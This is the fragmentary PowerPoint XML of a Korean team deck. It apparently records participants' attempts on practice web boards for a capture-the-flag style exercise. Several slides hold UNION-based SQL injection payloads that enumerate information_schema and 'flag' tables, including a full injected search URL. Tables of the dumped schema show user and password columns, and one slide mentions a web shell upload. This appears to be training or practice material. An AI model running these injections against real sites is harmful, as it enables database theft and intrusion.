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7" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="289" r:id="rId7"/>
    <p:sldId id="290" r:id="rId8"/>
    <p:sldId id="273" r:id="rId9"/>
    <p:sldId id="276" r:id="rId10"/>
    <p:sldId id="291" r:id="rId11"/>
    <p:sldId id="274" r:id="rId12"/>
    <p:sldId id="277" r:id="rId13"/>
    <p:sldId id="283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E5238-C19F-4080-E020-924F6AF51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361BCD-83C8-9BAA-D5A0-C9218C9D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3AAE3-E6B2-33D2-636D-A1BF64D4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8553B-047A-2EA4-34CD-03E561FD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4AE46-1B87-C6A3-9399-CF9E815A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8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5A6D9-7AAF-0B1C-4DBE-4209C23E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DFB4D-B51E-4823-7621-5CB6B882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88BFC-5554-88F4-B298-510922D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7B604-F8F2-D906-C2CC-38AC0D51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E20EA-96E6-1951-FA7D-62F4D129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A20320-AFFF-0C0A-B8E0-5356B0D8B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7CA99E-1E33-5759-D385-E4C8BA46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2CBC2-42BB-C579-2354-BC21D277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F2AF6-EA45-9B20-9ECB-83ACB5F5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11495-E2E5-5D09-920F-C2C8A7DE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6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A96A-0EC0-48A4-2B87-E640E4B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462C4-E37C-0251-BA08-7A83ABAD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37ABD-F573-0568-A3B3-BAEA283D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7AE5D-C7AE-8609-8603-63C0C9A4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A35BF-3CC7-E3BC-E714-456E878A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6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3B1B3-8A47-894D-A398-5CA4E24D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817DC-CB3C-B796-E645-65CC06A9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D9538-165F-A538-17F1-B7248B74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72C4A-C810-719E-18E4-0C7D5374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B9F9A-5B5E-D82E-546C-94195DF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2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5BD34-6932-AE8C-E501-04DD2C30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D3A9E-62DD-4135-D17E-37A6863FF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C6B4C-B706-00F2-0532-A38EBC1D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28CDA-7149-B4D6-692C-FFFA4598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2CBFE-DDF6-92F1-4BCE-90FA6C27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B9976-9BDF-DB6B-A719-3BBDE1C4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5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C8953-B481-2D31-287D-89737575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55762-5586-6B70-B802-5B99C2A28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FC632-ABDC-AE0A-688F-9559EF58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3BCBBD-5101-AE0B-40F1-A1DD1956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94FE3D-B4F7-3BC7-AE8D-07132214B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F44B1D-BECD-1D18-044A-618AD40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AA6126-33BB-E411-C880-325A61CC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5BC229-66D1-DA1C-1923-AF1A043F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4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C05D1-FC6C-AC64-4371-633C84D7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5A2E2-B3D0-11F3-3DFA-94A0255A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25B708-27AC-76C2-04FA-950218D1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79F3D-F59B-C50E-4ED1-CE50A70F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1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2DB868-20F2-8635-CA62-B91CE5E4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39B11-F0DE-6767-CB0A-A7E25044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8FFCF-2135-13E9-039D-0749E14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6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E24FF-620A-00EA-CEDB-8BA6864D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3EB3F-F62C-0699-FB30-C68DE6BD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B41B2-0CDB-FECD-FA84-A18CAEA50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B0AD1-63FF-BFD0-B4DE-52CF4B0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A6232-49CF-03E5-4FA7-A9BF5C88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1B036-3BEC-E9B7-19FC-612EDF7F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45EA0-E497-A718-B9BB-AE53E487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54AD38-0BCB-F095-0608-0ACA60374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A1AB-F2C2-9A61-BAF6-A8A3CACC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1BA2F-F86B-C692-9CDB-74148833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7625B-07F9-A75D-67B6-E743BDEF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04DA6-722E-2BED-8E30-EDC2F01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851E22-0F51-EF0B-FE01-9A77195E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49DC6-45C4-5B89-3FC6-D4904202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CA03C-18A6-4A02-F29F-7FF7405B5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8DC2-F4FD-4774-8DEE-6320FC423265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41F7-F5C0-946F-FEAA-C789E6570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0BC60-A560-3202-24B1-275C7420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46D6-477A-48FC-97BD-3EDB1963D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7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20.39.184.187:629/read.php?number=18" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://20.39.184.187:629/read.php?number=29" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://20.39.184.187:629/read.php?number=11" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://20.39.184.187:629/read.php?number=17" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://20.39.184.187:629/read.php?number=27" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://20.39.184.187:629/read.php?number=6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.39.184.187:629/read.php?number=16" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://20.39.184.187:629/read.php?number=26" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://20.39.184.187:629/read.php?number=13" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://20.39.184.187:629/read.php?number=1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://20.39.184.187:629/read.php?number=24" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://20.39.184.187:629/read.php?number=12" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://20.39.184.187:629/read.php?number=23" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://20.39.184.187:629/read.php?number=3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20.196.208.20:3020/boardView.php?idx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57443-FFBA-E4DE-42B0-470C8501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 err="1"/>
              <a:t>이하빈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5BBA-2C26-4FB4-7811-C7DB2C76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' union select 1,column_name,3,4,5,6,table_name,8 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t> = 'flag';-- -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69B2A1-663B-6F61-814D-ED1D7AA6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9" y="2813255"/>
            <a:ext cx="6185522" cy="336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D710-2B36-4CCE-415C-98531C4D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 err="1"/>
              <a:t>최화영</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>–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EAEE1-01E1-DCEB-76D9-28071689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x' union select 1,2,3,4,5,6 from flag.2z3rtr; -- -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426C61-1B78-10EE-69B7-804A53B4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63" y="3025439"/>
            <a:ext cx="9351074" cy="31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0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621BD-98DD-9218-19C3-D7F09277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 err="1"/>
              <a:t>이여진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42CB-B60E-71F1-8733-87B68923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ax' union select column_name,table_name,3,4,5,6,7 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> = 'flag';-- -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5EAF56-0426-96A6-CE02-3F6F9EFC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62" y="3395275"/>
            <a:ext cx="560148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2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621BD-98DD-9218-19C3-D7F09277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 err="1"/>
              <a:t>이여진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42CB-B60E-71F1-8733-87B68923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ax' union select 1,2,3,4,5,6,7 from flag.4477yq;-- -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CCA14-80AE-072E-3C98-4DB5B993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3103055"/>
            <a:ext cx="604921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CB06-4565-3989-CA03-DD99E5CF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GHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이형석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7D843-A207-576B-9801-605FAA79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' union select 1,2,table_name,column_name,5,6,7 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>데이터베이스 자체가 없음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5FA705-C63A-CDF9-1D70-9517AB8F6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72772"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10297500" y="2097534"/>
          <a:ext cx="1387545" cy="4447584"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="77086">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2106631049"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="770858">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2333220928"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="154172">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2334051562"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="308343">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="914067179"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="77086">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2637710744"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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3545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u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="57A0EE"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>ㅁㄴㅇㄹ</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" alt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kknock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2023-08-04 10:40:03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18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60711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3544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3"/>
                        </a:rPr>
                        <a:t>qwe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qwe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2023-08-05 11:49:24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11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680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3543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4"/>
                        </a:rPr>
                        <a:t>qfweqfwef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qwerasdf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04:17:27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16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041235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3542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5"/>
                        </a:rPr>
                        <a:t>aaa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a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05:27:57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10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127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3541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6"/>
                        </a:rPr>
                        <a:t>fwqf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qwerasdf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09:47:26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9204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3540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7"/>
                        </a:rPr>
                        <a:t>a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a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09:49:07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81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3539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8"/>
                        </a:rPr>
                        <a:t>a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a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09:49:33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92000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3538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9"/>
                        </a:rPr>
                        <a:t>a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test0105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10:38:32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54567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3537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0"/>
                        </a:rPr>
                        <a:t>a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a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12:16:00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315653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1"/>
                        </a:rPr>
                        <a:t>a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test0105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13:19:04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40363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2"/>
                        </a:rPr>
                        <a:t>qwe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qwe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13:26:54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26971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3534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 dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="57A0EE"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>a</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="300" dirty="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a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16:54:47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35761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3533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4"/>
                        </a:rPr>
                        <a:t>a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a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2023-08-06 16:55:15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60072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board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number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5411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board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content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74873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3530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board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title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51221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3529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board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id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55023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3528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board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date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21398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3527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board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hit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31830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board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file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48607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comment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number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19385"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1640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3524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comment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board_number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93794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3523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comment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id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39869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comment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content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0857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comment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date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7544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3520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member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id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75792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3519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member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password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71288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3518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member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date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23180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3517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member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permit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788858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reply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idx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27153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reply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con_num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74092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3514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reply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name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467443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3513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reply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pw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9987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3512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reply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content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3205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3511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reply</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="30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date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069336"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="11963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3510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u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="57A0EE"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>ADMINISTRABLE_ROLE_AUTHORIZATIONS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="300" dirty="0">
                        <a:effectLst/>
                      </a:endParaRP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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>USER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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>5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00" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>6</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="15417" marR="15417" marT="15417" marB="1541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4845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F96E3A4-1E28-E870-38D8-E649AF68EC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58109" y="2665939"/>
            <a:ext cx="6853382" cy="3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7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4B78-6AB6-8DEC-7248-8195541A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GHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이형석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>–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939EB-C0BB-C2A6-A3D2-E7D6456B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웹셀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 업로드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CCA26-6707-73A7-2144-22DA12B4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13" y="2474231"/>
            <a:ext cx="6691174" cy="40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7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4B78-6AB6-8DEC-7248-8195541A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GHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이형석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>–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939EB-C0BB-C2A6-A3D2-E7D6456B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웹셀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E3894F-AF4D-1C1B-0027-9FB3EBFD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36" y="2468730"/>
            <a:ext cx="7992440" cy="35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4B78-6AB6-8DEC-7248-8195541A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GHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이형석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>–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939EB-C0BB-C2A6-A3D2-E7D6456B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F2148-6077-F1DF-B079-7A3F5D72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2683069"/>
            <a:ext cx="8142515" cy="34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4B78-6AB6-8DEC-7248-8195541A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GHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이형석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>–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939EB-C0BB-C2A6-A3D2-E7D6456B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flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 없음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AB8E7-ECCB-362B-845C-F041509F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28" y="2590119"/>
            <a:ext cx="8577943" cy="40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57443-FFBA-E4DE-42B0-470C8501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 err="1"/>
              <a:t>이하빈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65BBA-2C26-4FB4-7811-C7DB2C76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'union select 1,2,3,4,5,6,7,8 from flag.kwi5vz;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>가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C8050D-7F4F-F4E4-E233-7A6EE821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68" y="3217842"/>
            <a:ext cx="7338263" cy="31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8FD0F-239B-7ABB-CBB6-5B4968D7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 err="1"/>
              <a:t>정은하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F3A4F-DB64-1E24-56EF-E37AECD6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http://20.196.208.20:3020/boardSearch.php?searchOption=boardTitle&amp;searchTxt=axax' union select 1,null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>table_name,null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, column_name,null,4,5,null,null,null,null  from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>;-- -    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br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276887-0F38-6F45-B7C4-88F53E2F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17" y="2605459"/>
            <a:ext cx="6181436" cy="34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E9F25-627D-A316-A125-054938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 err="1"/>
              <a:t>정은하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73B8F-E9AC-951F-FB7E-394E681D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http://20.196.208.20:3020/boardSearch.php?searchOption=boardTitle&amp;searchTxt=axax' union select 1,null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>table_name,null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, column_name,null,4,5,null,null,null,null  from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> = 'flag';-- -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E103E8-79F6-1373-1674-9C736FF4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0" y="2712027"/>
            <a:ext cx="7370618" cy="41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8A6FD-95F9-AA9F-45B2-502E823F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 err="1"/>
              <a:t>정은하</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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E7B2E-0994-E218-5183-41C9D2B9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6234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where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>절 추가로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>flag 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>검사 시 아무것도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>안나옴</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>첫번째 사진에서 하나씩 다 찾아도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>라는 글자가 들어간 사용자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>직접만든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db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>는 없었음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>오른쪽은 첫번째 쿼리 결과에 대한 하단부임</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
            </a:b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F71B3D-9BEB-88B3-FF4D-6FE09F661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41438"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8379002" y="681037"/>
          <a:ext cx="3063798" cy="5705660"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="510633">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2739846520"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="510633">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1595397242"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="510633">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="225011753"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="926244">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="891434703"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="95022">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4115910660"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="510633">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="629825058"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="20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innodb_redo_log_files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FILE_ID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015971"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="20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innodb_redo_log_files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FILE_NAME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48467"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="20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innodb_redo_log_files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START_LSN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09916"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="20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innodb_redo_log_files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END_LSN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54085"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="20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innodb_redo_log_files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SIZE_IN_BYTES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9154"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="20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innodb_redo_log_files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IS_FULL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858861"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2044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innodb_redo_log_files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CONSUMER_LEVEL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8866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userIdx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409012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userId</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700" dirty="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01481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userPw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45437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userName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441950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userPhone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2623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userEmail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05352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userDate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40463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boardIdx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58987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userId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546222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boardTitle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39861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boardDetail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34963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boardDate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05505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boardFile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517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boardViews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140245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boardGood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9536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fileContents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03501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fileName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05250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fileSize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95997"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="116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3B4140"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans KR"/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>userboardtb</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700">
                        <a:solidFill>
                          <a:srgbClr val="3B4140"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Noto Sans KR"/>
                      </a:endParaRP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fileType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3B414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34811" marR="34811" marT="17405" marB="1740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4811" marR="34811" marT="17405" marB="17405">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnT w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="BD82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066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3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1C351-C236-E345-D882-FE066B3A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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>김형도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E2A35-877C-BFD5-BD9B-98E59124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' union select 1,table_name,3,column_name,5,6,7,8,9 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t> = 'flag';-- -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5C11D-0488-7255-B8CF-EE62F66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81" y="2886646"/>
            <a:ext cx="6177267" cy="32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5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1C351-C236-E345-D882-FE066B3A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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>김형도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E2A35-877C-BFD5-BD9B-98E59124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'union select 1,2,3,4,5,6,7,8,9 from flag.vwe6tp;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>데이터가 늘어나지 않음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>-&gt; flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>가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A7C35D-1353-1B30-826A-C9435B77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36" y="2901490"/>
            <a:ext cx="5853128" cy="29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D272-7DED-78A7-177D-5620D9DB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김경민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1C6CB-B5B5-2358-9284-93B39ABE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ax' union select 1,table_name,3,4,column_name,6 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> = 'flag';-- -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6D4CB-572F-FAA1-6DF9-DEBCF0D5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63" y="3939868"/>
            <a:ext cx="8723474" cy="20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4D272-7DED-78A7-177D-5620D9DB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김경민 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-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1C6CB-B5B5-2358-9284-93B39ABE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ax' union select 1,foblja,3,4,5,6 from flag.jzjo40;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>마찬가지로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A6320-5BFE-46DA-9871-B3518991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18" y="3240379"/>
            <a:ext cx="7877764" cy="20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843</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>375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Noto Sans KR</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>E이하빈 - DB</vt:lpstr>
      <vt:lpstr>E이하빈 - DB</vt:lpstr>
      <vt:lpstr>J정은하 - DB</vt:lpstr>
      <vt:lpstr>J정은하 - DB</vt:lpstr>
      <vt:lpstr>J정은하 - DB</vt:lpstr>
      <vt:lpstr>H김형도 - DB</vt:lpstr>
      <vt:lpstr>H김형도 - DB</vt:lpstr>
      <vt:lpstr>F김경민 - DB</vt:lpstr>
      <vt:lpstr>F김경민 - DB</vt:lpstr>
      <vt:lpstr>F최화영 – DB</vt:lpstr>
      <vt:lpstr>D이여진 - DB</vt:lpstr>
      <vt:lpstr>D이여진 - DB</vt:lpstr>
      <vt:lpstr>GHOST이형석 - DB</vt:lpstr>
      <vt:lpstr>GHOST이형석 – server</vt:lpstr>
      <vt:lpstr>GHOST이형석 – server</vt:lpstr>
      <vt:lpstr>GHOST이형석 – server</vt:lpstr>
      <vt:lpstr>GHOST이형석 –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정원 최</dc:creator>
  <cp:lastModifiedBy>정원 최</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-06T10:48:19Z</dcterms:created>
